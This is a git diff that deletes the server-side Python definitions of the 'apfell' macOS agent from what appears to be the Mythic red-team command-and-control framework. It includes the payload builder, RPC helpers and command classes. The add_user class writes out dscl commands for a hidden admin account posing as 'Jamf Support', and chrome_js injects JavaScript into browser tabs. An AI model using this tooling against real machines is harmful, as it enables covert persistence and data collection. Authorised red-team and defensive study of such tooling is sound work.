payload.response["file_id"]["agent_file_id"] - self.filename = payload.response["file_id"]["filename"] - self.c2info = payload.response["c2info"] - self.commands = payload.response["commands"] - self.build_parameters = payload.response["build_parameters"] - else: - self.uuid = None - self.tag = None - self.operator = None - 
self.creation_time = None - self.payload_type = None - self.operation = None - self.wrapped_payload = None - self.deleted = None - self.auto_generated = None - self.task = None - self.contents = None - self.build_phase = None - self.agent_file_id = None - self.filename = None - self.c2info = None - self.commands = None - self.build_parameters = None - - @property - def uuid(self): - return self._uuid - - @uuid.setter - def uuid(self, uuid): - self._uuid = uuid - - @property - def tag(self): - return self._tag - - @tag.setter - def tag(self, tag): - self._tag = tag - - @property - def operator(self): - return self._operator - - @operator.setter - def operator(self, operator): - self._operator = operator - - @property - def creation_time(self): - return self._creation_time - - @creation_time.setter - def creation_time(self, creation_time): - self._creation_time = creation_time - - @property - def payload_type(self): - return self._payload_type - - @payload_type.setter - def payload_type(self, payload_type): - self._payload_type = payload_type - - @property - def location(self): - return self._location - - @property - def operation(self): - return self._operation - - @operation.setter - def operation(self, operation): - self._operation = operation - - @property - def wrapped_payload(self): - return self._wrapped_payload - - @wrapped_payload.setter - def wrapped_payload(self, wrapped_payload): - self._wrapped_payload = wrapped_payload - - @property - def deleted(self): - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - - @property - def auto_generated(self): - return self._auto_generated - - @auto_generated.setter - def auto_generated(self, auto_generated): - self._auto_generated = auto_generated - - @property - def task(self): - return self._task - - @task.setter - def task(self, task): - self._task = task - - @property - def contents(self): - return self._contents - - @contents.setter - def contents(self, contents): - try: - self._contents = base64.b64decode(contents) - except: - self._contents = contents - - @property - def build_phase(self): - return self._build_phase - - @build_phase.setter - def build_phase(self, build_phase): - self._build_phase = build_phase - - @property - def c2info(self): - return self._c2info - - @c2info.setter - def c2info(self, c2info): - self._c2info = c2info - - @property - def build_parameters(self): - return self._build_parameters - - @build_parameters.setter - def build_parameters(self, build_parameters): - self._build_parameters = build_parameters - - def set_profile_parameter_value(self, - c2_profile: str, - parameter_name: str, - value: any): - if self.c2info is None: - raise Exception("Can't set value when c2 info is None") - for c2 in self.c2info: - if c2["name"] == c2_profile: - c2["parameters"][parameter_name] = value - return - raise Exception("Failed to find c2 name") - - def set_build_parameter_value(self, - parameter_name: str, - value: any): - if self.build_parameters is None: - raise Exception("Can't set value when build parameters are None") - for param in self.build_parameters: - if param["name"] == parameter_name: - param["value"] = value - return - self.build_parameters.append({"name": parameter_name, "value": value}) - - -class MythicPayloadRPC(MythicBaseRPC): - async def get_payload_by_uuid(self, uuid: str) -> MythicPayloadRPCResponse: - resp = await self.call( - {"action": "get_payload_by_uuid", "uuid": uuid, "task_id": self.task_id} - ) - return MythicPayloadRPCResponse(resp) - - async 
def build_payload_from_template( - self, - uuid: str, - destination_host: str = None, - wrapped_payload: str = None, - description: str = None, - ) -> MythicPayloadRPCResponse: - resp = await self.call( - { - "action": "build_payload_from_template", - "uuid": uuid, - "task_id": self.task_id, - "destination_host": destination_host, - "wrapped_payload": wrapped_payload, - "description": description, - } - ) - return MythicPayloadRPCResponse(resp) - - async def build_payload_from_parameters(self, - payload_type: str, - c2_profiles: list, - commands: list, - build_parameters: list, - filename: str = None, - tag: str = None, - destination_host: str = None, - wrapped_payload: str = None) -> MythicPayloadRPCResponse: - """ - :param payload_type: String value of a payload type name - :param c2_profiles: List of c2 dictionaries of the form: - { "c2_profile": "HTTP", - "c2_profile_parameters": { - "callback_host": "https://domain.com", - "callback_interval": 20 - } - } - :param filename: String value of the name of the resulting payload - :param tag: Description for the payload for the active callbacks page - :param commands: List of string names for the commands that should be included - :param build_parameters: List of build parameter dictionaries of the form: - { - "name": "version", "value": 4.0 - } - :param destination_host: String name of the host where the payload will go - :param wrapped_payload: If payload_type is a wrapper, wrapped payload UUID - :return: - """ - resp = await self.call( - { - "action": "build_payload_from_parameters", - "task_id": self.task_id, - "payload_type": payload_type, - "c2_profiles": c2_profiles, - "filename": filename, - "tag": tag, - "commands": commands, - "build_parameters": build_parameters, - "destination_host": destination_host, - "wrapped_payload": wrapped_payload - } - ) - return MythicPayloadRPCResponse(resp) - - async def build_payload_from_MythicPayloadRPCResponse(self, - resp: MythicPayloadRPCResponse, - destination_host: str = None) -> MythicPayloadRPCResponse: - c2_list = [] - for c2 in resp.c2info: - c2_list.append({ - "c2_profile": c2["name"], - "c2_profile_parameters": c2["parameters"] - }) - resp = await self.call( - { - "action": "build_payload_from_parameters", - "task_id": self.task_id, - "payload_type": resp.payload_type, - "c2_profiles": c2_list, - "filename": resp.filename, - "tag": resp.tag, - "commands": resp.commands, - "build_parameters": resp.build_parameters, - "destination_host": destination_host, - "wrapped_payload": resp.wrapped_payload - } - ) - return MythicPayloadRPCResponse(resp) - - async def register_payload_on_host(self, - uuid: str, - host: str): - """ - Register a payload on a host for linking purposes - :param uuid: - :param host: - :return: - """ - resp = await self.call( - { - "action": "register_payload_on_host", - "task_id": self.task_id, - "uuid": uuid, - "host": host - } - ) - return MythicPayloadRPCResponse(resp) diff --git a/Payload_Types/apfell/mythic/MythicResponseRPC.py b/Payload_Types/apfell/mythic/MythicResponseRPC.py deleted file mode 100644 index 8ae588a96..000000000 --- a/Payload_Types/apfell/mythic/MythicResponseRPC.py +++ /dev/null @@ -1,43 +0,0 @@ -from MythicBaseRPC import * -import base64 - - -class MythicResponseRPCResponse(RPCResponse): - def __init__(self, resp: RPCResponse): - super().__init__(resp._raw_resp) - - -class MythicResponseRPC(MythicBaseRPC): - async def user_output(self, user_output: str) -> MythicResponseRPCResponse: - resp = await self.call( - { - "action": "user_output", - 
"user_output": user_output, - "task_id": self.task_id, - } - ) - return MythicResponseRPCResponse(resp) - - async def update_callback(self, callback_info: dict) -> MythicResponseRPCResponse: - resp = await self.call( - { - "action": "update_callback", - "callback_info": callback_info, - "task_id": self.task_id, - } - ) - return MythicResponseRPCResponse(resp) - - async def register_artifact( - self, artifact_instance: str, artifact_type: str, host: str = None - ) -> MythicResponseRPCResponse: - resp = await self.call( - { - "action": "register_artifact", - "task_id": self.task_id, - "host": host, - "artifact_instance": artifact_instance, - "artifact": artifact_type, - } - ) - return MythicResponseRPCResponse(resp) diff --git a/Payload_Types/apfell/mythic/MythicSocksRPC.py b/Payload_Types/apfell/mythic/MythicSocksRPC.py deleted file mode 100644 index 3a1b63df6..000000000 --- a/Payload_Types/apfell/mythic/MythicSocksRPC.py +++ /dev/null @@ -1,29 +0,0 @@ -from MythicBaseRPC import * - - -class MythicSocksRPCResponse(RPCResponse): - def __init__(self, socks: RPCResponse): - super().__init__(socks._raw_resp) - - -class MythicSocksRPC(MythicBaseRPC): - async def start_socks(self, port: int) -> MythicSocksRPCResponse: - resp = await self.call( - { - "action": "control_socks", - "task_id": self.task_id, - "start": True, - "port": port, - } - ) - return MythicSocksRPCResponse(resp) - - async def stop_socks(self) -> MythicSocksRPCResponse: - resp = await self.call( - { - "action": "control_socks", - "stop": True, - "task_id": self.task_id, - } - ) - return MythicSocksRPCResponse(resp) diff --git a/Payload_Types/apfell/mythic/PayloadBuilder.py b/Payload_Types/apfell/mythic/PayloadBuilder.py deleted file mode 100644 index 6333bdbff..000000000 --- a/Payload_Types/apfell/mythic/PayloadBuilder.py +++ /dev/null @@ -1,302 +0,0 @@ -from enum import Enum -from abc import abstractmethod -from pathlib import Path -import base64 -from CommandBase import * - - -class BuildStatus(Enum): - Success = "success" - Error = "error" - - -class SupportedOS(Enum): - Windows = "Windows" - MacOS = "macOS" - Linux = "Linux" - WebShell = "WebShell" - Chrome = "Chrome" - - -class BuildParameterType(Enum): - String = "String" - ChooseOne = "ChooseOne" - - -class BuildParameter: - def __init__( - self, - name: str, - parameter_type: BuildParameterType = None, - description: str = None, - required: bool = None, - verifier_regex: str = None, - default_value: str = None, - choices: [str] = None, - value: any = None, - verifier_func: callable = None, - ): - self.name = name - self.verifier_func = verifier_func - self.parameter_type = ( - parameter_type if parameter_type is not None else ParameterType.String - ) - self.description = description if description is not None else "" - self.required = required if required is not None else True - self.verifier_regex = verifier_regex if verifier_regex is not None else "" - self.default_value = default_value - if value is None: - self.value = default_value - else: - self.value = value - self.choices = choices - - @property - def name(self): - return self._name - - @name.setter - def name(self, name): - self._name = name - - @property - def parameter_type(self): - return self._parameter_type - - @parameter_type.setter - def parameter_type(self, parameter_type): - self._parameter_type = parameter_type - - @property - def description(self): - return self._description - - @description.setter - def description(self, description): - self._description = description - - @property - def 
required(self): - return self._required - - @required.setter - def required(self, required): - self._required = required - - @property - def verifier_regex(self): - return self._verifier_regex - - @verifier_regex.setter - def verifier_regex(self, verifier_regex): - self._verifier_regex = verifier_regex - - @property - def default_value(self): - return self._default_value - - @default_value.setter - def default_value(self, default_value): - self._default_value = default_value - - @property - def value(self): - return self._value - - @value.setter - def value(self, value): - if value is None: - self._value = value - else: - if self.verifier_func is not None: - self.verifier_func(value) - self._value = value - else: - self._value = value - - def to_json(self): - return { - "name": self._name, - "parameter_type": self._parameter_type.value, - "description": self._description, - "required": self._required, - "verifier_regex": self._verifier_regex, - "parameter": self._default_value - if self._parameter_type == BuildParameterType.String - else "\n".join(self.choices), - } - - -class C2ProfileParameters: - def __init__(self, c2profile: dict, parameters: dict = None): - self.parameters = {} - self.c2profile = c2profile - if parameters is not None: - self.parameters = parameters - - def get_parameters_dict(self): - return self.parameters - - def get_c2profile(self): - return self.c2profile - - -class CommandList: - def __init__(self, commands: [str] = None): - self.commands = [] - if commands is not None: - self.commands = commands - - def get_commands(self) -> [str]: - return self.commands - - def remove_command(self, command: str): - self.commands.remove(command) - - def add_command(self, command: str): - for c in self.commands: - if c == command: - return - self.commands.append(command) - - def clear(self): - self.commands = [] - - -class BuildResponse: - def __init__(self, status: BuildStatus, payload: bytes = None, message: str = None): - self.status = status - self.payload = payload if payload is not None else b"" - self.message = message if message is not None else "" - - def get_status(self) -> BuildStatus: - return self.status - - def set_status(self, status: BuildStatus): - self.status = status - - def get_payload(self) -> bytes: - return self.payload - - def set_payload(self, payload: bytes): - self.payload = payload - - def set_message(self, message: str): - self.message = message - - def get_message(self) -> str: - return self.message - - -class PayloadType: - - support_browser_scripts = [] - - def __init__( - self, - uuid: str = None, - agent_code_path: Path = None, - c2info: [C2ProfileParameters] = None, - commands: CommandList = None, - wrapped_payload: str = None, - ): - self.commands = commands - self.base_path = agent_code_path - self.agent_code_path = agent_code_path / "agent_code" - self.c2info = c2info - self.uuid = uuid - self.wrapped_payload = wrapped_payload - - @property - @abstractmethod - def name(self): - pass - - @property - @abstractmethod - def file_extension(self): - pass - - @property - @abstractmethod - def author(self): - pass - - @property - @abstractmethod - def supported_os(self): - pass - - @property - @abstractmethod - def wrapper(self): - pass - - @property - @abstractmethod - def wrapped_payloads(self): - pass - - @property - @abstractmethod - def note(self): - pass - - @property - @abstractmethod - def supports_dynamic_loading(self): - pass - - @property - @abstractmethod - def c2_profiles(self): - pass - - @property - @abstractmethod - def 
build_parameters(self): - pass - - @abstractmethod - async def build(self) -> BuildResponse: - pass - - def get_parameter(self, key): - if key in self.build_parameters: - return self.build_parameters[key].value - else: - return None - - async def set_and_validate_build_parameters(self, buildinfo: dict): - # set values for all of the key-value pairs presented to us - for key, bp in self.build_parameters.items(): - if key in buildinfo and buildinfo[key] is not None: - bp.value = buildinfo[key] - if bp.required and bp.value is None: - raise ValueError( - "{} is a required parameter but has no value".format(key) - ) - - def get_build_instance_values(self): - values = {} - for key, bp in self.build_parameters.items(): - if bp.value is not None: - values[key] = bp.value - return values - - def to_json(self): - return { - "ptype": self.name, - "file_extension": self.file_extension, - "author": self.author, - "supported_os": ",".join([x.value for x in self.supported_os]), - "wrapper": self.wrapper, - "wrapped": self.wrapped_payloads, - "supports_dynamic_loading": self.supports_dynamic_loading, - "note": self.note, - "build_parameters": [b.to_json() for k, b in self.build_parameters.items()], - "c2_profiles": self.c2_profiles, - "support_scripts": [ - a.to_json(self.base_path) for a in self.support_browser_scripts - ], - } diff --git a/Payload_Types/apfell/mythic/__init__.py b/Payload_Types/apfell/mythic/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/Payload_Types/apfell/mythic/agent_functions/__init__.py b/Payload_Types/apfell/mythic/agent_functions/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/Payload_Types/apfell/mythic/agent_functions/add_user.py b/Payload_Types/apfell/mythic/agent_functions/add_user.py deleted file mode 100644 index 18a14096f..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/add_user.py +++ /dev/null @@ -1,190 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class AddUserArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "password": CommandParameter( - name="password", - type=ParameterType.String, - description="p@55w0rd_here for new user", - required=False, - default_value="p@55w0rd_here", - ), - "passwd": CommandParameter( - name="passwd", - type=ParameterType.Credential_Value, - description="password of the user that will execute the commands", - ), - "user": CommandParameter( - name="user", - type=ParameterType.Credential_Account, - description="username that will execute the commands", - ), - "createprofile": CommandParameter( - name="createprofile", - type=ParameterType.Boolean, - required=False, - default_value=False, - description="create a user profile or not", - ), - "usershell": CommandParameter( - name="usershell", - type=ParameterType.String, - description="which shell environment should the new user have", - required=False, - default_value="/bin/bash", - ), - "primarygroupid": CommandParameter( - name="primarygroupid", - type=ParameterType.Number, - required=False, - description="POSIX primary group id for the new account", - default_value=80, - ), - "uniqueid": CommandParameter( - name="uniqueid", - type=ParameterType.Number, - required=False, - default_value=403, - description="POSIX unique id for the user", - ), - "homedir": CommandParameter( - name="homedir", - type=ParameterType.String, - required=False, - description="/Users/.jamf_support", - ), - "realname": CommandParameter( - 
name="realname", - type=ParameterType.String, - required=False, - default_value="Jamf Support User", - description="Full user name", - ), - "username": CommandParameter( - name="username", - type=ParameterType.String, - required=False, - default_value=".jamf_support", - description="POSIX username for account", - ), - "hidden": CommandParameter( - name="hidden", - type=ParameterType.Boolean, - required=False, - default_value=False, - description="Should the account be hidden from the logon screen", - ), - "admin": CommandParameter( - name="admin", - type=ParameterType.Boolean, - required=False, - default_value=True, - description="Should the account be an admin account", - ), - } - - async def parse_arguments(self): - self.load_args_from_json_string(self.command_line) - - -class AddUserCommand(CommandBase): - cmd = "add_user" - needs_admin = True - help_cmd = "add_user" - description = "Add a local user to the system by wrapping the Apple binary, dscl." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - argument_class = AddUserArguments - attackmapping = ["T1136", "T1169"] - - async def create_tasking(self, task: MythicTask) -> MythicTask: - if task.args.get_arg("hidden"): - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="dscl . create /Users/{} IsHidden 1".format(task.args.get_arg("user")), - artifact_type="Process Create", - ) - else: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="dscl . create /Users/{}".format(task.args.get_arg("user")), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="dscl . create /Users/{} UniqueID {}".format( - task.args.get_arg("user"), - task.args.get_arg("uniqueid") - ), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="dscl . create /Users/{} PrimaryGroupID {}".format( - task.args.get_arg("user"), - task.args.get_arg("primarygroupid") - ), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="dscl . create /Users/{} NFSHomeDirectory \"{}\"".format( - task.args.get_arg("user"), - task.args.get_arg("homedir") - ), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="dscl . create /Users/{} RealName \"{}\"".format( - task.args.get_arg("user"), - task.args.get_arg("realname") - ), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="dscl . create /Users/{} UserShell {}".format( - task.args.get_arg("user"), - task.args.get_arg("usershell") - ), - artifact_type="Process Create", - ) - if task.args.get_arg("admin"): - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="dseditgroup -o edit -a {} -t user admin".format(task.args.get_arg("user")), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="dscl . 
passwd /Users/{} \"{}\"".format( - task.args.get_arg("user"), - task.args.get_arg("password") - ), - artifact_type="Process Create", - ) - if task.args.get_arg("createprofile"): - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="mkdir \"{}\"".format(task.args.get_arg("homedir")), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="cp -R \"/System/Library/User Template/English.lproj/\" \"{}\"".format( - task.args.get_arg("homedir") - ), - artifact_type="Process Create", - ) - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="chown -R {}:staff \"{}\"".format( - task.args.get_arg("user"), - task.args.get_arg("homedir") - ), - artifact_type="Process Create", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/builder.py b/Payload_Types/apfell/mythic/agent_functions/builder.py deleted file mode 100644 index 94f98d266..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/builder.py +++ /dev/null @@ -1,59 +0,0 @@ -from PayloadBuilder import * - - -class Apfell(PayloadType): - - name = "apfell" - file_extension = "js" - author = "@its_a_feature_" - supported_os = [SupportedOS.MacOS] - wrapper = False - wrapped_payloads = [] - note = """This payload uses JavaScript for Automation (JXA) for execution on macOS boxes.""" - supports_dynamic_loading = True - build_parameters = {} - c2_profiles = ["HTTP", "dynamicHTTP"] - support_browser_scripts = [ - BrowserScript(script_name="create_table", author="@its_a_feature_") - ] - - async def build(self) -> BuildResponse: - # this function gets called to create an instance of your payload - resp = BuildResponse(status=BuildStatus.Success) - # create the payload - try: - command_code = "" - for cmd in self.commands.get_commands(): - command_code += ( - open(self.agent_code_path / "{}.js".format(cmd), "r").read() + "\n" - ) - base_code = open( - self.agent_code_path / "base" / "apfell-jxa.js", "r" - ).read() - base_code = base_code.replace("UUID_HERE", self.uuid) - base_code = base_code.replace("COMMANDS_HERE", command_code) - all_c2_code = "" - if len(self.c2info) != 1: - resp.set_status(BuildStatus.Error) - resp.set_message( - "Error building payload - apfell only supports one c2 profile at a time." - ) - return resp - for c2 in self.c2info: - profile = c2.get_c2profile() - c2_code = open( - self.agent_code_path - / "c2_profiles" - / "{}.js".format(profile["name"]), - "r", - ).read() - for key, val in c2.get_parameters_dict().items(): - c2_code = c2_code.replace(key, val) - all_c2_code += c2_code - base_code = base_code.replace("C2PROFILE_HERE", all_c2_code) - resp.payload = base_code.encode() - resp.message = "Successfully built!" 
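# A minimal sketch of the substitution-based build() shown above, assuming hypothetical
# file names, parameter values, and a placeholder UUID; the real method reads from
# self.agent_code_path and the selected C2ProfileParameters instead.
payload_uuid = "00000000-0000-0000-0000-000000000000"  # placeholder, normally self.uuid
base_code = open("apfell-jxa.js", "r").read()
command_code = "".join(open(cmd + ".js", "r").read() + "\n" for cmd in ["cat", "cd"])
c2_code = open("HTTP.js", "r").read()
for key, val in {"callback_host": "https://example.com", "callback_interval": "20"}.items():
    c2_code = c2_code.replace(key, val)  # each C2 parameter name is replaced with its value
payload = (base_code.replace("UUID_HERE", payload_uuid)
                    .replace("COMMANDS_HERE", command_code)
                    .replace("C2PROFILE_HERE", c2_code))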
- except Exception as e: - resp.set_status(BuildStatus.Error) - resp.set_message("Error building payload: " + str(e)) - return resp diff --git a/Payload_Types/apfell/mythic/agent_functions/cat.py b/Payload_Types/apfell/mythic/agent_functions/cat.py deleted file mode 100644 index e59bfe91b..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/cat.py +++ /dev/null @@ -1,51 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class CatArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "path": CommandParameter( - name="path", - type=ParameterType.String, - description="path to file (no quotes required)", - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - self.add_arg("path", self.command_line) - else: - raise ValueError("Missing arguments") - - -class CatCommand(CommandBase): - cmd = "cat" - needs_admin = False - help_cmd = "cat /path/to/file" - description = "Read the contents of a file and display it to the user. No need for quotes and relative paths are fine" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - argument_class = CatArguments - attackmapping = ["T1081", "T1106"] - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.NSString.stringWithContentsOfFileEncodingError", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/cd.py b/Payload_Types/apfell/mythic/agent_functions/cd.py deleted file mode 100644 index 83dffe896..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/cd.py +++ /dev/null @@ -1,51 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class CdArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "path": CommandParameter( - name="path", - type=ParameterType.String, - description="path to change directory to", - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - self.args["path"].value = self.command_line - else: - self.args["path"].value = "." - - -class CdCommand(CommandBase): - cmd = "cd" - needs_admin = False - help_cmd = "cd [path]" - description = "Change the current working directory to another directory. 
No quotes are necessary and relative paths are fine" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - argument_class = CdArguments - attackmapping = ["T1083"] - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="fileManager.changeCurrentDirectoryPath", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/chrome_bookmarks.py b/Payload_Types/apfell/mythic/agent_functions/chrome_bookmarks.py deleted file mode 100644 index cc065ddb0..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/chrome_bookmarks.py +++ /dev/null @@ -1,39 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class ChromeBookmarksArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class ChromeBookmarksCommand(CommandBase): - cmd = "chrome_bookmarks" - needs_admin = False - help_cmd = "chrome_bookmarks" - description = "This uses AppleEvents to list information about all of the bookmarks in Chrome. If Chrome is not currently running, this will launch Chrome (potential OPSEC issue) and might have a conflict with trying to access Chrome's bookmarks as Chrome is starting. It's recommended to not use this unless Chrome is already running. Use the list_apps function to check if Chrome is running. In Mojave this will cause a popup the first time asking for permission for your process to access Chrome" - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1217"] - argument_class = ChromeBookmarksArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="Target Application of Chrome", - artifact_type="AppleEvent Sent", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/chrome_js.py b/Payload_Types/apfell/mythic/agent_functions/chrome_js.py deleted file mode 100644 index 2df9c201d..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/chrome_js.py +++ /dev/null @@ -1,61 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class ChromeJsArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "window": CommandParameter( - name="window", - type=ParameterType.Number, - description="Window # from chrome_tabs", - ), - "javascript": CommandParameter( - name="javascript", - type=ParameterType.String, - description="javascript to execute", - ), - "tab": CommandParameter( - name="tab", - type=ParameterType.Number, - description="Tab # from chrome_tabs", - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - raise ValueError("Missing JSON arguments") - else: - raise ValueError("Missing arguments") - - -class ChromeJsCommand(CommandBase): - cmd = "chrome_js" - needs_admin = False - help_cmd = 
"chrome_js" - description = "This uses AppleEvents to execute the specified JavaScript code into a specific browser tab. The chrome_tabs function will specify for each tab the window/tab numbers that you can use for this function. Note: by default this ability is disabled in Chrome now, you will need to go to view->Developer->Allow JavaScript from Apple Events." - version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1106", "T1064"] - argument_class = ChromeJsArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="Target Application of Chrome", - artifact_type="AppleEvent Sent", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/chrome_tabs.py b/Payload_Types/apfell/mythic/agent_functions/chrome_tabs.py deleted file mode 100644 index 7a42f9387..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/chrome_tabs.py +++ /dev/null @@ -1,39 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class ChromeTabsArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = {} - - async def parse_arguments(self): - pass - - -class ChromeTabsCommand(CommandBase): - cmd = "chrome_tabs" - needs_admin = False - help_cmd = "chrome_tabs" - description = "This uses AppleEvents to list information about all of the open tabs in all of the open Chrome instances. If Chrome is not currently running, this will launch Chrome (potential OPSEC issue) and might have a conflict with trying to access Chrome tabs as Chrome is starting. It's recommended to not use this unless Chrome is already running. Use the list_apps function to check if Chrome is running. In Mojave this will cause a popup the first time asking for permission for your process to access Chrome." 
- version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1010"] - argument_class = ChromeTabsArguments - - async def create_tasking(self, task: MythicTask) -> MythicTask: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="Target Application of Chrome", - artifact_type="AppleEvent Sent", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/clipboard.py b/Payload_Types/apfell/mythic/agent_functions/clipboard.py deleted file mode 100644 index 0f95811eb..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/clipboard.py +++ /dev/null @@ -1,64 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class ClipboardArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "types": CommandParameter( - name="Clipboard Types", - type=ParameterType.Array, - required=False, - default_value=["public.utf8-plain-text"], - description="Types of clipboard data to retrieve, defaults to public.utf8-plain-text", - ), - "data": CommandParameter( - name="data", - type=ParameterType.String, - description="Data to put on the clipboard", - required=False, - ), - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - self.add_arg("data", self.command_line) - - -class ClipboardCommand(CommandBase): - cmd = "clipboard" - needs_admin = False - help_cmd = "clipboard [data]" - description = "Get all the types of contents on the clipboard, return specific types, or set the contents of the clipboard. Root has no clipboard!" 
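# The parse_arguments() pattern above is shared across these command classes: a leading
# "{" marks JSON produced by the UI popup and is handled by load_args_from_json_string(),
# while anything else is mapped onto the single free-form argument via add_arg(). For
# clipboard, for example, both of these task the same thing (illustrative values):
#
#   clipboard some text for the clipboard
#   clipboard {"data": "some text for the clipboard"}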
- version = 1 - is_exit = False - is_file_browse = False - is_process_list = False - is_download_file = False - is_remove_file = False - is_upload_file = False - author = "@its_a_feature_" - attackmapping = ["T1115"] - argument_class = ClipboardArguments - browser_script = BrowserScript(script_name="clipboard", author="@its_a_feature_") - - async def create_tasking(self, task: MythicTask) -> MythicTask: - if task.args.get_arg("data") != "": - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.NSPasteboard.generalPasteboard.setStringForType", - artifact_type="API Called", - ) - else: - resp = await MythicResponseRPC(task).register_artifact( - artifact_instance="$.NSPasteboard.generalPasteboard.dataForType", - artifact_type="API Called", - ) - return task - - async def process_response(self, response: AgentResponse): - pass diff --git a/Payload_Types/apfell/mythic/agent_functions/current_user.py b/Payload_Types/apfell/mythic/agent_functions/current_user.py deleted file mode 100644 index 0258d8187..000000000 --- a/Payload_Types/apfell/mythic/agent_functions/current_user.py +++ /dev/null @@ -1,60 +0,0 @@ -from CommandBase import * -import json -from MythicResponseRPC import * - - -class CurrentUserArguments(TaskArguments): - def __init__(self, command_line): - super().__init__(command_line) - self.args = { - "method": CommandParameter( - name="method", - type=ParameterType.ChooseOne, - choices=["api", "jxa"], - description="Use AppleEvents or ObjectiveC calls to get user information", - default_value="api", - ) - } - - async def parse_arguments(self): - if len(self.command_line) > 0: - if self.command_line[0] == "{": - self.load_args_from_json_string(self.command_line) - else: - self.add_arg("method", self.command_line) - else: - raise ValueError("Missing arguments") - pass - - -class CurrentUserCommand(CommandBase): - cmd = "current_user" - needs_admin = False - help_cmd = "current_user" - description = "This uses AppleEvents or ObjectiveC APIs to get information about the current user." 
